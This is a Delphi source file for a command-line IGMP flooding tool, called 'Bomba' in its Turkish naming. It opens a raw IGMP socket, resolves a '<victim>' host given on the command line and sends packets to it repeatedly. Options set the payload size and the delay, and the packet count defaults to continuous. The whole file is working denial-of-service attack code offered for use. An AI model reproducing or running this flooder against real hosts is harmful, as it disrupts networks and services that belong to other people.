unit u_main;

interface

uses
  u_winsck2, u_sysutils;

type
  TBombaOptions = packed record
    Delay, Num, PacketSize, Sended: Cardinal;
    RandomSeek: Int64;
    Socket: TSocket;
    HedefAdres: TSockAddrIn;
  end;

var
  BombaOpt: TBombaOptions;

  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
    tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure SendBomba;
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  Random;
  Inc(BombaOpt.RandomSeek);
  Result := (Random(High(Integer)) + BombaOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; // function for sending packet and for checking send error
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); // send packet
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send igmp packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket;
begin
  BombaOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_IGMP);
  if BombaOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
end;

procedure SendBomba;
var
  Len: integer;
  Buf: PChar;
begin
  Len := 8 + BombaOpt.PacketSize;
  GetMem(Buf, Len);
  try
    FillChar(Buf^, Len, 0);
    Gonder(BombaOpt.Socket, Buf^, Len, 0, BombaOpt.HedefAdres, Sizeof(BombaOpt.HedefAdres));
  finally
    Freemem(Buf);
  end;
end;

procedure SetDefaultOptions;
begin
  BombaOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  BombaOpt.HedefAdres.sin_family := AF_INET;
  BombaOpt.HedefAdres.sin_port := htons(GetRandomValue(High(Word)) + 1);
  BombaOpt.PacketSize := 5;
end;

procedure SetParams;
var
  i: integer;
  pstr: string;
  Ch: Char;
begin
  for i := 2 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      's': BombaOpt.PacketSize := StrtoIntDef(ParamStr(i + 1), 0);
      'n': BombaOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': BombaOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -s:    Extra data size (in bytes) (default 5)'#13#10 +
        '  -n:    Num of packets to send     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)              (default 0)'#13#10
       );
  Halt(0);
end;

end.
